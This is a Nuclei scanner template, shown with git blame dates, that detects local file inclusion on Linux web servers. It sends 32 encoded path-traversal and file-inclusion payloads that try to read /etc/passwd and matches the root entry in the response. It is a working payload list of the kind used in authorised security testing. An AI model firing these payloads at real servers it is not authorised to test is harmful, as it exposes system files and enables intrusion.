Files
nuclei-templates/http/vulnerabilities/generic/generic-linux-lfi.yaml

62 lines
2.8 KiB
YAML
Raw Normal View History

2021-08-07 23:02:17 +05:30
id: generic-linux-lfi
2020-10-20 15:47:25 +00:00
info:
name: Generic Linux - Local File Inclusion
2022-08-31 22:01:15 +05:30
author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
2020-10-20 15:47:25 +00:00
severity: high
2024-01-30 11:47:24 +01:00
description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
2022-08-31 22:01:15 +05:30
reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 32
2023-10-14 16:57:55 +05:30
tags: linux,lfi,generic
2020-10-20 15:47:25 +00:00
http:
2020-10-20 15:47:25 +00:00
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- "/etc/passwd"
- "/..%5cetc/passwd"
- "/..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5cetc/passwd"
- "/static/..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/./../../../../../../../../../../etc/passwd"
- "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
- "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
- "/..///////..////..//////etc/passwd"
- "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
- "/index.php?page=etc/passwd"
- "/index.php?page=etc/passwd%00"
- "/index.php?page=../../etc/passwd"
- "/index.php?page=....//....//etc/passwd"
- "/../../../../../../../../../etc/passwd"
2022-08-31 22:03:32 +05:30
stop-at-first-match: true
2020-10-20 15:47:25 +00:00
matchers:
- type: regex
2021-09-18 20:13:32 +01:00
regex:
2021-07-25 03:05:55 +05:30
- "root:.*:0:0:"
2020-10-20 15:47:25 +00:00
part: body
2025-08-14 08:29:52 +00:00
# digest: 4b0a00483046022100fc5a454419b2b363d9c16ddf20a9e4094115faebad7ad94d547e55bcabd33799022100e96e30aad0a39a6821da80d09008fbc1b3cc9e8605fb2c1b2c412824133d5e7f:922c64590222798bb761d5b6d8e72950